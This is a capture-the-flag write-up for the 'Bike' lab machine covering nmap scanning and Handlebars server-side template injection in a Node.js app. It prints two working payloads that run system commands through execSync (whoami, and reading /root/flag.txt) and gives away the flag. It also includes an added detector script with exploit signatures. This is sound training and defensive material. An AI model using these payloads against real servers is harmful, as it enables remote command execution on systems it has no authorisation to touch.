Bike

Task 1: What TCP ports does nmap identify as open? Answer with a list of ports separated by commas with no spaces, from low to high.

  • Run quick nmap scan:

nmap [Target IP]
  • This shows that ports 22 & 80 are open.

Task 2: What software is running the service listening on the http/web port identified in the first question?

  • Nmap version scan on port 80:

nmap -sV -p 80 [Target IP]
  • The answer is Node.js.

Task 3: What is the name of the Web Framework according to Wappalyzer?

  • Open the target IP in your web browser.

  • Make sure to have the Wappalyzer extension installed on your browser.

  • Once on the target page, check the Wappalyzer analysis.

  • It shows Express as the Web Framework.

Task 4: What is the name of the vulnerability we test for by submitting {{7*7}}?

  • Check the first part of the walkthrough given with the machine. This machine is based on server-side template injection (SSTI).

Task 5: What is the templating engine being used within Node.JS?

  • On the web page of the target IP, submit {{7*7}} in the email address form.

  • This will take you to an error page.

  • I browsed this page for a bit and found a reference in there to Handlebars.

Task 6: What is the name of the BurpSuite tab used to encode text?

  • Opening up Burp Suite, I found that the tab is called "Decoder".

Task 7: In order to send special characters in our payload in an HTTP request, we'll encode the payload. What type of encoding do we use?

  • On the Decoder tab of Burp Suite, use the drop-down menu to see the different types of encoding available.

  • The answer is URL.

Task 8: When we use a payload from HackTricks to try to run system commands, we get an error back. What is "not defined" in the response error?

  • Navigate to the HackTricks page, specifically the section on SSTI in Node.js Handlebars.

  • There is a script there to exploit the form. You can either URL-encode the script yourself or grab the already URL-encoded version at the bottom of that section.

    • Turn on FoxyProxy so the browser's traffic goes through Burp Suite, paste the URL-encoded script into the email form of the target web page and submit.

    • The request should now have been captured. From here, send the captured request in Burp Suite to the Repeater.

    • Click Send and you should get a response page with an error at the top.

    • The error will state that "Require" is not defined.

Task 9: What variable is the name of the top-level scope in Node.JS?

  • Reading through the walkthrough guide, I learned that the variable with the top-level scope is "Global".

    • This makes sense, as global variables apply throughout a program in other languages as well.

Task 10: By exploiting this vulnerability, we get command execution as the user that the webserver is running as. What is the name of that user?

  • Start with the initial script from HackTricks.

  • We will modify this script (changing the command passed to execSync to whoami) and then URL-encode it.

{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return process.mainModule.require('child_process').execSync('whoami');"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}
  • After you have modified the script, URL-encode it and send it through Burp Suite's Repeater.

  • You should get a response back showing that the user is "root".
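From the defender's side, the payloads used in Tasks 8 to 10 have a very recognisable shape once the URL encoding is undone: an arithmetic probe such as {{7*7}}, Handlebars block helpers ({{#with ...}}, {{#each ...}}), a lookup of "constructor", and a child_process/execSync call. The following is an added example (not part of the original walkthrough, and not code from the Bike machine) that decodes captured form bodies and classifies them as benign, probe, or exploit attempt. The sample request records, the field name "email", and the body-capture format are all constructed for this demo.

```javascript
// Added example: classify URL-encoded form submissions as benign, an SSTI
// probe, or an SSTI exploit attempt, based on the payload shape shown in
// the walkthrough. Sample records below are constructed, not real traffic.

// Indicator patterns. Order matters only for the 'matched' list that is
// reported back, not for the severity decision.
const SSTI_INDICATORS = [
  { name: 'arithmetic-probe', re: /\{\{\s*\d+\s*[*+\-\/]\s*\d+\s*\}\}/ },
  { name: 'block-helper', re: /\{\{#(with|each)\b/ },
  { name: 'constructor-lookup', re: /lookup\s+\S+\s+"constructor"/ },
  { name: 'child-process', re: /child_process|execSync|mainModule/ },
];

// Form bodies arrive URL-encoded; decode once so %7B%7B is seen as {{.
// Malformed percent-sequences are inspected as-is instead of being dropped.
function decodeBody(value) {
  try {
    return decodeURIComponent(value.replace(/\+/g, ' '));
  } catch (e) {
    return value;
  }
}

// Parse "key=value&key2=value2" into an object of decoded values.
function parseForm(body) {
  const fields = {};
  for (const pair of body.split('&')) {
    if (!pair) continue;
    const idx = pair.indexOf('=');
    const key = idx === -1 ? pair : pair.slice(0, idx);
    const val = idx === -1 ? '' : pair.slice(idx + 1);
    fields[decodeBody(key)] = decodeBody(val);
  }
  return fields;
}

// Classify one request body. Returns { severity, matched, field }:
//   'none'    - nothing template-like
//   'probe'   - only the arithmetic test ({{7*7}}) was seen
//   'exploit' - block helpers, constructor lookup or child_process present
function classifyBody(body) {
  const fields = parseForm(body);
  let matched = [];
  let field = null;
  for (const [key, value] of Object.entries(fields)) {
    const hits = SSTI_INDICATORS.filter((ind) => ind.re.test(value)).map((ind) => ind.name);
    if (hits.length > matched.length) {
      matched = hits;
      field = key;
    }
  }
  let severity = 'none';
  if (matched.some((n) => n !== 'arithmetic-probe')) severity = 'exploit';
  else if (matched.length > 0) severity = 'probe';
  return { severity, matched, field };
}

// Run the classifier over a list of { id, body } records.
function triage(requests) {
  return requests.map((r) => ({ id: r.id, ...classifyBody(r.body) }));
}

// Constructed sample bodies (hypothetical, not captured from the machine):
// 1 a normal signup, 2 the {{7*7}} probe, 3 a fragment of the Handlebars
// payload from this page, URL-encoded, 4 a benign comment that merely
// mentions curly braces and should not be flagged.
const SAMPLE_REQUESTS = [
  { id: 1, body: 'email=alice%40example.com' },
  { id: 2, body: 'email=%7B%7B7*7%7D%7D' },
  { id: 3, body: 'email=%7B%7B%23with%20%22s%22%20as%20%7Cstring%7C%7D%7D%7B%7Bthis.push%20%22return%20process.mainModule.require(%27child_process%27).execSync(%27whoami%27)%3B%22%7D%7D' },
  { id: 4, body: 'email=bob%2Bnews%40example.com&comment=I+love+%7B%7Bmustache%7D%7D+templates' },
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const result of triage(SAMPLE_REQUESTS)) {
    console.log(`request ${result.id}: ${result.severity} ${result.matched.join(',') || '-'}`);
  }
}
```

The arithmetic probe is reported separately from the exploit indicators because a lone {{7*7}} is what a tester sends first; seeing it in logs is the earliest signal that someone is checking whether the email field is rendered as a template, well before any execSync payload arrives.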

Capture the Flag:

  • Since we know the code above works, we can modify it again. We can either upload a reverse shell or just look for the flag.

    • In this case we will just look for the flag by modifying the script above. Normally, though, we would start a reverse shell and browse the target's filesystem from that shell, as that is easier to navigate.

  • In this case the flag is relatively easy to locate.

{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return process.mainModule.require('child_process').execSync('cat /root/flag.txt');"}}
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}
  • It is located in the /root directory as flag.txt (/root/flag.txt).

  • The flag is "6b258d726d287462d60c103d0142a81c"
